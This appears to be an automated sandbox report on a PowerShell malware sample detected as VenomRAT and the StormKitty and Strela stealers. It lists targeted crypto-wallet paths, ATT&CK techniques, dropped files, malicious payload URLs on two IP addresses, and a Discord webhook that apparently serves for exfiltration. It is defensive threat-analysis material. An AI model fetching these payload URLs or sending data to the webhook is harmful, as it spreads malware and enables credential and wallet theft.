Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior

Source: C:\Windows\Temp\Package.exe

Code function: 5_2_00D3FCE5 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

5_2_00D3FCE5

Source: C:\Windows\Temp\Package.exe

Code function: 5_2_00D3C9DB LookupAccountNameW,GetLastError,malloc,LookupAccountNameW,GetLastError,free,

5_2_00D3C9DB

Source: C:\Windows\Temp\Package.exe

Code function: 5_2_00D2B4F0 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z,__EH_prolog3,GetVersionExW,#1202,#538,#800,#6112,#2613,#384,#2089,#1197,#520,#986,#4604,#1197,#5977,

5_2_00D2B4F0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Yara detected VenomRAT

Source: Yara match	File source: 8.2.powershell.exe.6466862.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.powershell.exe.6076822.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.powershell.exe.6342ad8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.powershell.exe.6342ad8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2262741450.0000000005F62000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 2276, type: MEMORYSTR

Source: powershell.exe, 00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2262741450.0000000005F62000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: MSASCui.exe
Source: Amcache.hve.19.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.19.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.19.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: powershell.exe, 00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2262741450.0000000005F62000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: procexp.exe
Source: powershell.exe, 00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2262741450.0000000005F62000.00000004.00000800.00020000.00000000.sdmp, Amcache.hve.19.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected BrowserPasswordDump

Source: Yara match	File source: 8.2.powershell.exe.6466862.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.powershell.exe.6076822.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.powershell.exe.6342ad8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.powershell.exe.6342ad8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2262741450.0000000005F62000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 2276, type: MEMORYSTR

Yara detected StormKitty Stealer

Source: Yara match	File source: 8.2.powershell.exe.6342ad8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 2276, type: MEMORYSTR

Yara detected Strela Stealer

Source: Yara match

File source: Process Memory Space: powershell.exe PID: 2276, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: powershell.exe, 00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Electrum#\Electrum\wallets
Source: powershell.exe, 00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: \bytecoinJaxxk\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb
Source: powershell.exe, 00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Exodus+\Exodus\exodus.wallet
Source: powershell.exe, 00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Ethereum%\Ethereum\keystore
Source: powershell.exe, 00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: exodus
Source: powershell.exe, 00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Ethereum%\Ethereum\keystore
Source: powershell.exe, 00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Coinomi1\Coinomi\Coinomi\wallets
Source: powershell.exe, 00000000.00000002.2242371379.00007FF848EA0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: sqlcolumnencryptionkeystoreprovider

Source: Yara match	File source: 8.2.powershell.exe.6466862.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.powershell.exe.6076822.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.powershell.exe.6342ad8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.powershell.exe.6342ad8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2262741450.0000000005F62000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 2276, type: MEMORYSTR

Remote Access Functionality

Yara detected BrowserPasswordDump

Source: Yara match	File source: 8.2.powershell.exe.6466862.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.powershell.exe.6076822.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.powershell.exe.6342ad8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.powershell.exe.6342ad8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2262741450.0000000005F62000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 2276, type: MEMORYSTR

Yara detected StormKitty Stealer

Source: Yara match	File source: 8.2.powershell.exe.6342ad8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 2276, type: MEMORYSTR

Yara detected Strela Stealer

Source: Yara match

File source: Process Memory Space: powershell.exe PID: 2276, type: MEMORYSTR

Source: C:\Windows\Temp\Package.exe

Code function: 5_2_00D34899 #1662,#540,lstrcpyW,CreateBindCtx,MkParseDisplayName,#2644,#2810,#800,lstrlenW,#2810,#2644,#800,

5_2_00D34899

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	11 Native API	1 DLL Side-Loading	1 DLL Side-Loading	11 Deobfuscate/Decode Files or Information	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	11 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Exploitation for Client Execution	1 Scheduled Task/Job	112 Process Injection	121 Obfuscated Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Scheduled Task/Job	2 Registry Run Keys / Startup Folder	1 Scheduled Task/Job	1 Software Packing	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	2 Clipboard Data	1 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	3 PowerShell	Login Hook	2 Registry Run Keys / Startup Folder	1 DLL Side-Loading	NTDS	24 System Information Discovery	Distributed Component Object Model	Input Capture	21 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	11 Masquerading	LSA Secrets	131 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	21 Virtualization/Sandbox Evasion	Cached Domain Credentials	2 Process Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	112 Process Injection	DCSync	21 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	HTML Smuggling	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
2 ps1.ps1	3%	ReversingLabs

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\iacipmps\iacipmps.dll	100%	Avira	HEUR/AGEN.1300034
C:\Users\user\AppData\Local\Temp\iacipmps\iacipmps.dll	100%	Joe Sandbox ML
C:\Windows\Temp\Package.exe	0%	ReversingLabs
C:\Windows\Temp\iviewers.dll	3%	ReversingLabs

Source	Detection	Scanner	Label
http://147.45.44.131/infopage/ersyb.exe	100%	Avira URL Cloud	malware
http://147.45.44.131/infopage/file.exe	0%	Avira URL Cloud	safe
http://147.45.448JU	0%	Avira URL Cloud	safe
http://147.45.44.131/infopage/iubn.ps1	100%	Avira URL Cloud	malware
http://147.45.44.131/infopage/iviewers.dll	100%	Avira URL Cloud	malware
http://147.45.44.131/infopage/rwvg1.exe	100%	Avira URL Cloud	malware
http://147.45.44.131/infopage/ersyb.exe0W	0%	Avira URL Cloud	safe
http://185.149.146.164	0%	Avira URL Cloud	safe
http://147.45.448V	0%	Avira URL Cloud	safe
http://185.149.146.164/wrcaf.ps1	100%	Avira URL Cloud	malware

Name	Malicious	Antivirus Detection	Reputation
http://147.45.44.131/infopage/file.exe	true	Avira URL Cloud: safe	unknown
http://147.45.44.131/infopage/iubn.ps1	true	Avira URL Cloud: malware	unknown
http://185.149.146.164/wrcaf.ps1	false	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://147.45.44.131/infopage/ersyb.exe	powershell.exe, 00000008.00000002.2248203691.0000000004FD8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2288952062.0000000008670000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000009.00000003.2208675662.00000000052C6000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000009.00000003.2208452005.00000000052D5000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000009.00000003.2208523176.00000000052C4000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000009.00000003.2209557435.00000000052C6000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000009.00000002.2210070157.00000000052C6000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000009.00000003.2208576514.00000000052D5000.00000004.00000020.00020000.00000000.sdmp, iacipmps.dll.9.dr, iacipmps.0.cs.8.dr	false	Avira URL Cloud: malware	unknown
http://nuget.org/NuGet.exe	powershell.exe, 00000003.00000002.2209534008.00000169BFC31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2209534008.00000169BFD73000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2262741450.0000000005D19000.00000004.00000800.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000008.00000002.2248203691.0000000004E06000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000008.00000002.2248203691.0000000004E06000.00000004.00000800.00020000.00000000.sdmp	false		high
https://go.micro	powershell.exe, 00000003.00000002.2177596881.00000169B07F3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://discordapp.com/api/v6/users/	powershell.exe, 00000008.00000002.2262741450.0000000005F62000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 00000008.00000002.2262741450.0000000005D19000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 00000008.00000002.2262741450.0000000005D19000.00000004.00000800.00020000.00000000.sdmp	false		high
http://upx.sf.net	Amcache.hve.19.dr	false		high
https://aka.ms/pscore6	powershell.exe, 00000000.00000002.2225680546.0000025C42951000.00000004.00000800.00020000.00000000.sdmp	false		high
http://147.45.448JU	powershell.exe, 00000008.00000002.2248203691.000000000506F000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://147.45.44.131/infopage/ersyb.exe0W	csc.exe, 00000009.00000003.2209327326.0000000005571000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 00000008.00000002.2248203691.0000000004E06000.00000004.00000800.00020000.00000000.sdmp	false		high
https://urn.to/r/sds_seeaCould	powershell.exe, 00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2262741450.0000000005F62000.00000004.00000800.00020000.00000000.sdmp	false		high
http://147.45.44.131/infopage/iviewers.dll	powershell.exe, 00000003.00000002.2177596881.00000169B11B3000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://james.newtonking.com/projects/json	powershell.exe, 00000008.00000002.2262741450.0000000005F62000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.newtonsoft.com/jsonschema	powershell.exe, 00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2262741450.0000000005F62000.00000004.00000800.00020000.00000000.sdmp	false		high
http://147.45.44.131	powershell.exe, 00000003.00000002.2177596881.00000169B17AC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2177596881.00000169B1497000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2248203691.000000000506F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2248203691.0000000004E06000.00000004.00000800.00020000.00000000.sdmp	false		high
http://147.45.44.131/infopage/rwvg1.exe	powershell.exe, 00000008.00000002.2248203691.0000000004EF7000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://crl.m	powershell.exe, 00000008.00000002.2283880375.00000000072F9000.00000004.00000020.00020000.00000000.sdmp	false		high
https://stackoverflow.com/q/14436606/23354cIt	powershell.exe, 00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2262741450.0000000005F62000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ipinfo.io/ip	powershell.exe, 00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2262741450.0000000005F62000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/LimerBoy/StormKitty	powershell.exe, 00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2248203691.0000000004EF7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2248203691.0000000004FD8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2248203691.000000000525B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/pscore6lB	powershell.exe, 00000008.00000002.2248203691.0000000004CB1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://stackoverflow.com/q/11564914/23354;	powershell.exe, 00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2262741450.0000000005F62000.00000004.00000800.00020000.00000000.sdmp	false		high
https://stackoverflow.com/q/2152978/23354	powershell.exe, 00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2262741450.0000000005F62000.00000004.00000800.00020000.00000000.sdmp	false		high
https://discord.com/api/webhooks/1016614786533969920/fMJOOjA1pZqjV8_s0JC86KN9Fa0FeGPEHaEak8WTADC18s5	powershell.exe, 00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2262741450.0000000005F62000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 00000008.00000002.2262741450.0000000005D19000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 00000003.00000002.2209534008.00000169BFC31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2209534008.00000169BFD73000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2262741450.0000000005D19000.00000004.00000800.00020000.00000000.sdmp	false		high
http://147.45.448V	powershell.exe, 00000008.00000002.2248203691.0000000004FD8000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.ms/pscore68	powershell.exe, 00000000.00000002.2225680546.0000025C4296A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2177596881.00000169AFBC1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://urn.to/r/sds_see	powershell.exe, 00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2262741450.0000000005F62000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000000.00000002.2225680546.0000025C4299C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2177596881.00000169AFBC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2248203691.0000000004CB1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.149.146.164	powershell.exe, 00000003.00000002.2177596881.00000169B07F3000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.149.146.164	unknown	Russian Federation		42861	FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU	false
147.45.44.131	unknown	Russian Federation		2895	FREE-NET-ASFREEnetEU	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1583431
Start date and time:	2025-01-02 19:13:06 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 53s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	21
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	2 ps1.ps1
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winPS1@28/23@0/2
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 99% Number of executed functions: 49 Number of non-executed functions: 154
Cookbook Comments:	Found application associated with file extension: .ps1

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.42.73.29, 20.190.159.64, 13.107.246.45, 52.149.20.212
Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, login.live.com, otelrules.azureedge.net, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target powershell.exe, PID 2180 because it is empty
Execution Graph export aborted for target powershell.exe, PID 3200 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: 2 ps1.ps1

Simulations

Behavior and APIs

Time	Type	Description
13:14:06	API Interceptor	67x Sleep call for process: powershell.exe modified
13:14:25	API Interceptor	1x Sleep call for process: WerFault.exe modified
19:14:14	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DeleteApp.url

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.149.146.164	ps1.ps1	Get hash	malicious	Unknown	Browse	185.149.146.164/trwsfg.ps1
147.45.44.131	vfrcxq.ps1	Get hash	malicious	AveMaria, DcRat, KeyLogger, StormKitty, Strela Stealer, VenomRAT	Browse	147.45.44.131/infopage/yijth.exe
	vfdjo.exe	Get hash	malicious	AveMaria, DcRat, KeyLogger, StormKitty, VenomRAT	Browse	147.45.44.131/infopage/yijth.exe
	gqub.bat	Get hash	malicious	AveMaria, DcRat, KeyLogger, StormKitty, Strela Stealer, VenomRAT	Browse	147.45.44.131/infopage/yijth.exe
	trwsfg.ps1	Get hash	malicious	AveMaria, DcRat, KeyLogger, StormKitty, Strela Stealer, VenomRAT	Browse	147.45.44.131/infopage/yijth.exe
	iviewers.dll	Get hash	malicious	LummaC	Browse	147.45.44.131/infopage/hgfpj.exe
	qoqD1RxV0F.exe	Get hash	malicious	LummaC	Browse	147.45.44.131/infopage/inbg.exe
	iviewers.dll	Get hash	malicious	LummaC	Browse	147.45.44.131/infopage/inbg.exe
	Captcha.hta	Get hash	malicious	LummaC, Cobalt Strike, HTMLPhisher, LummaC Stealer	Browse	147.45.44.131/infopage/bnkh.exe
	htZgRRla8S.exe	Get hash	malicious	LummaC Stealer	Browse	147.45.44.131/infopage/ung0.exe
	Captcha.hta	Get hash	malicious	LummaC, Cobalt Strike, HTMLPhisher, LummaC Stealer	Browse	147.45.44.131/infopage/ilk.exe

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU	ps1.ps1	Get hash	malicious	Unknown	Browse	185.149.146.164
	https://gogl.to/3HGT	Get hash	malicious	CAPTCHA Scam ClickFix, DcRat, KeyLogger, StormKitty, VenomRAT	Browse	185.149.146.164
	armv4l.elf	Get hash	malicious	Unknown	Browse	185.149.148.61
	arm7.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	77.91.103.44
	LRkZCtzQ3.ps1	Get hash	malicious	Unknown	Browse	77.91.73.101
	GottaBolt.exe	Get hash	malicious	Unknown	Browse	77.91.73.101
	GottaBolt.exe	Get hash	malicious	Unknown	Browse	77.91.73.101
	T0jSGXdxX5.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	185.149.146.15
	PC4rbXSgl4.exe	Get hash	malicious	Unknown	Browse	77.91.77.187
	file.exe	Get hash	malicious	Phorpiex	Browse	77.91.77.92
FREE-NET-ASFREEnetEU	lDO4WBEQyL.exe	Get hash	malicious	GO Backdoor	Browse	147.45.196.157
	vfrcxq.ps1	Get hash	malicious	AveMaria, DcRat, KeyLogger, StormKitty, Strela Stealer, VenomRAT	Browse	147.45.44.131
	vfdjo.exe	Get hash	malicious	AveMaria, DcRat, KeyLogger, StormKitty, VenomRAT	Browse	147.45.44.131
	gqub.bat	Get hash	malicious	AveMaria, DcRat, KeyLogger, StormKitty, Strela Stealer, VenomRAT	Browse	147.45.44.131
	trwsfg.ps1	Get hash	malicious	AveMaria, DcRat, KeyLogger, StormKitty, Strela Stealer, VenomRAT	Browse	147.45.44.131
	https://gogl.to/3HGT	Get hash	malicious	CAPTCHA Scam ClickFix, DcRat, KeyLogger, StormKitty, VenomRAT	Browse	147.45.44.131
	Loader.exe	Get hash	malicious	Meduza Stealer	Browse	147.45.44.216
	tzA45NGAW4.lnk	Get hash	malicious	Unknown	Browse	147.45.49.155
	soft 1.14.exe	Get hash	malicious	Meduza Stealer	Browse	147.45.44.216
	iviewers.dll	Get hash	malicious	LummaC	Browse	147.45.44.131

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
C:\Windows\Temp\Package.exe	script.ps1	Get hash	malicious	CredGrabber, Meduza Stealer	Browse
C:\Windows\Temp\Package.exe	script.hta	Get hash	malicious	CredGrabber, Meduza Stealer	Browse

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Package.exe_55a92a429a98c25290d2b6d865f190a11d46a9_8a8df546_3612ac26-7d59-450f-a365-58a4a19527e4\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9015116234622907
Encrypted:	false
SSDEEP:	192:WxyPHwfZpigh0K5Q+BjG7aQqzuiFXZ24IO80:uyPHwBpigiK5Q+BjRzuiFXY4IO80
MD5:	36D7CCA06A33F1B1F2D99C06AA6B3ED0
SHA1:	53C204D68FE062DA582F1E74730742CD156F11BB
SHA-256:	C4C646E0D48330BACF83E0EAFEC11AFB2896BAE36148BCDE2EF7344609CEE91F
SHA-512:	4AA5C3896DC66AB202D205E3AFD0C40D48C1ED47F37A5440AC1F7C297E9E9162733CDC03CE274AE99D9DB5F048900953E4F83782D6461AC2377A624ABBCF9630
Malicious:	false
